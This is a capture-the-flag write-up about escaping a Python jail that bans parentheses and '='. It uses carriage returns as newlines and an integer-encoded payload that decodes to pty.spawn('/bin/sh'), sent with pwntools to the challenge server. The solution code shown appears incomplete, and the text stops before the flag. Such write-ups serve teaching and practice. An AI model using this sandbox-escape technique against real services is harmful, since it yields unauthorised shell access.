EPFL's CTF team


This challenge was analogue to the other python jails, but with some additional constraints:

Source code of the server:

line = input('>>> ')

blacklist = "()="
for item in blacklist:
    if item in line.lower():
        raise Exception()


This challenge was not easy, as with no parenthesis you are not able to make any calls to a function.

However, after playing around for a while, we noticed that the eval() python function parsed \r as newlines, and this let us send multi-line scripts through a single call to input().

We then bypassed the parentheses usage through python decorators on an empty class, using an integer-encoded payload to avoid the parentheses check by the server.

This was our solution for this one:

from pwn import *

io = connect('chal.b01lers.com', 1336)
payload = """import pty
for x in [[112,116,121,46,115,112,97,119,110,40,34,47,98,105,110,47,115,104,34,41]]:
  for y in [lambda z: x]:
	class z:
	  pass""".replace("\n", "\r")


And this gives the following flag: